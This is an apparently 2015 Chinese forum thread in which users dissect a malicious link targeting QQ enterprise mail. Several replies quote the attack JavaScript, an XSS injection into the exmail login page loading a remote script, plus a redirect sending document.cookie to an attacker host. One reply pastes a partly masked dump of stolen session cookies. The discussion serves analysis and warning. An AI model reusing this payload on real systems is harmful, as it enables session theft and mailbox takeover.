这是一个创建于 3635 天前的主题,其中的信息可能已经有所发展或是发生改变。
http://eeee.washbowl.com.cn/
这个是个挂马地址,请各位大师分析一下
如果我点开 除了 QQ 邮箱的 Cookie 小偷还能获得什么?
第 1 条附言 2015-11-02 18:07:59 +08:00
有什么信息可以追踪到写这个 scirpt 的人么...这个网站的主机和 DNS 是?
第 2 条附言 2015-11-03 14:01:20 +08:00
提醒:不要用 IPHONE 打开浏览器链接!!!!!!!!
 | 2 jedyu 2015-11-02 13:42:28 +08:00 手贱点了进去,一堆信息被上传了 |
| 5 jedyu 2015-11-02 13:51:29 +08:00 |
 | 7 WenJimmy 2015-11-02 13:53:58 +08:00 不敢点 |
| 8 jedyu 2015-11-02 14:00:32 +08:00 @saxon c=wxstaytime=1423741712; idqq_account=theCanChange=1; theShowUin=145xxxxxx; [email protected]; EmailCanSeach=1; EmailIsActive=1; UinCanSeach=1; shouldshowmail=1; firstsetidqq=1; MSK=0;; verifysession=h019bd3fd70a412c5e236282065369308f17xxxxxxbc0abc5294375bf583f5axxxxxxaf4f28ba; qz_gdt=m6uqgvwxxxxxxq4ezk4ka; qqmusic_uin=; qqmusic_key=; qqmusic_fromtag=; new_mail_num=14xxxxxx8&1; qm_flag=0; [email protected]; sid=1407607908&exxxxxx115757efa325bc9b271,cvEGXXdNb8dQ.|-1683484644&354xxxxxx6cdfc76ddafdeb,cDA0IfXXXq4mY.; biz_username=261xxxxxx; CCSHOW=0000; username=140761208&1403227908|-16342184644&261233652; ssl_edition=b31.exmail.qq.com; Hm_lvt_bdfb0d7xxxxxx0c5a5a2475c291ac7aca2=14xxxxxx; Hm_lpvt_bdfb0d72xxxxxx5a5a2475c291ac7aca2=14xxxxxx; _ga=GA1.3.1469923463.1445309872; qm_username=14xxxxxx; qm_sid=3240209253e03xxxxxx90db7a6,qSnpxxxxxxHVOR255bUx1by1rSWxxxxxxeFJna18.; RK=CEeuCexxGR; pt_clientip=133b3c0cxxxxxx4f; pt_serverip=b7ff0abfxxxxxx60; pt2gguin=o0014xxxxxx; uin=o0014xxxxxx; skey=@uF8W0XXXc; ptisp=cnc; ptcz=dccb14fd40d2xxxxxx43834eabd88d4d5a73c12561f4be2350fcxxxxxxa985; pgv_info=ssid=s776441213&pgvReferrer=; pgv_pvid=775212126; o_cookie=14xxxxxx; uid=12xxxxxx; dc_vplaying=0; tinfo=14xxxxxx.0000*; wimrefreshrun=0&; autologin=n &u=lockKey8&r=http://eeee.washbowl.com.cn/htmlpage5.html |
 | 10 kikyous 2015-11-02 14:13:52 +08:00 <script> function test(PARAMS) { var temp = document.createElement("form"); temp.acceptCharset = "utf-8"; //By Wfox temp.action = 'http://m.exmail.qq.com/cgi-bin/login'; temp.method = "post"; temp.style.display = "none"; for (var x in PARAMS) { var opt = document.createElement("textarea"); opt.name = x; opt.value = PARAMS[x]; temp.appendChild(opt); } document.body.appendChild(temp); temp.submit(); } test({ uin: '\\"</script><script src=http://ryige.com/q/8></script>', }); </script> 谁来讲解一下, qq.com 的 cookie 不是被 post 到腾讯的服务器了吗?他们是怎么得到的? |
 | 11 laydown 2015-11-02 14:27:02 +08:00 我没看正文直接点了,我要不要重装系统啊?!!! |
 | 12 soolby 2015-11-02 14:28:17 +08:00 定期改一下密码复杂一点。 把你的提示问题的答案设置的复杂一点(记得备份) |
 | 13 aliuwr 2015-11-02 14:28:55 +08:00 估计就是这个 http://www.wooyun.org/bugs/wooyun-2015-0144918 10-08 就确认了,还没修复。不知道是不好修复,还是不够重视。 rank 也只给 1 ,真没意思。 @laydown 速度改 QQ 密码就好了。 |
 | 16 skyun 2015-11-02 14:45:13 +08:00 手贱。直接点进去了。。。 |
 | 17 wgf2008 2015-11-02 14:46:55 +08:00 D 它 |
 | 18 ScotGu 2015-11-02 14:48:47 +08:00 既然这个网站可以直接获取 cookies 那么每天上网百度出的一堆垃圾站也可能用这招,只是没有这个有针对性。 看来用邮件客户端很有必要啊。 |
 | 19 Tuibimba 2015-11-02 14:55:37 +08:00 via Android 我的 iphone 被偷了后也收到过这类链接 点进去后发现不对劲 立马把相关密码都改了 |
 | 20 BOYPT 2015-11-02 14:57:26 +08:00  在匿名模式打开看了下,自动去刷一大堆常见网站,看来有漏用户信息漏洞的公共网站不少啊 |
 | 21 wdlth 2015-11-02 14:57:47 +08:00  1 用的阿里云…… |
 | 22 wohenyingyu01 2015-11-02 15:00:18 +08:00 网址点进去后发现是个新闻网站。。。 |
 | 23 Evi1m0 2015-11-02 15:17:27 +08:00 @BOYPT 两个 iframe ,一些常见网站是人民网的分享接口进行的访问,不是攻击者。 另外一个 iframe 是进行攻击者的操作: <iframe src="http://society.people.com.cn/n/2015/1031/c1008-27760163.html" style="width:100%;height:1200px;border:none"></iframe> <iframe src="http://www.v2ex.com/htmlpage5.html" style="display:none"></iframe> --------------- function test(PARAMS) { var temp = document.createElement("form"); temp.acceptCharset = "utf-8"; //By Wfox temp.action = 'http://m.exmail.qq.com/cgi-bin/login'; temp.method = "post"; temp.style.display = "none"; for (var x in PARAMS) { var opt = document.createElement("textarea"); opt.name = x; opt.value = PARAMS[x]; temp.appendChild(opt); } document.body.appendChild(temp); temp.submit(); } test({ uin: '\\"</script><script src=http://ryige.com/q/8></script>', }); document.domain="qq.com"; window.Onload=documentrrady; function documentrrady(){ window.location.href="http://ryige.com/server/AddQQUser?c="+encodeURI(document.cookie)+"&u=lockKey8&r="+encodeURI(document.referrer) }; |
| 24 BOYPT 2015-11-02 15:24:43 +08:00 比较好奇的是,往 qq 的 login post 一下,然后 document.domain="qq.com";这样就能从 document.cookie 拿信息了?? |
| 25 skyun 2015-11-02 15:44:14 +08:00 吓得我赶紧改了 QQ 密码,清空了浏览器 cookie ,往常用网站上重新登陆了次,刷新了 cookie 。。。这样就没事了吧? |
 | 26 Sleebi 2015-11-02 15:47:36 +08:00 这次还好忍住了,先看评论,保命 |
| 27 Evi1m0 2015-11-02 15:58:08 +08:00 嗯,刚才测试了一下,如果你的企业邮箱在登录情况下访问了如上网址,是可以登录你的邮箱。 |
 | 29 yksoft1 2015-11-02 17:24:25 +08:00 用虚拟机开,发现 firefox 下 http://ryige.com/q/8 的脚本未被执行 不知怎么回事 |
 | 30 ChoateYao 2015-11-02 17:35:11 +08:00 难道我去慢了,打开只有一个 IIS 的图标什么事情都没有发生。 |
 | 32 saxon OP @wohenyingyu01 并不是 只是挂了一个 iframe |
 | 33 RHFS 2015-11-02 18:52:41 +08:00 你还是提醒一下别人别乱点链接吧。。。 我觉得很多人点玩看了评论都吓到了 |
 | 34 curiosity 2015-11-02 19:39:18 +08:00 我擦...点开了...有什么补救方法嘛! |
| 35 Evi1m0 2015-11-02 19:47:04 +08:00 1 |
 | 38 DevineRapier 2016-07-08 21:18:26 +08:00 @kikyous web 第一课: cookie 在本地, session 在服务器 |
Select Language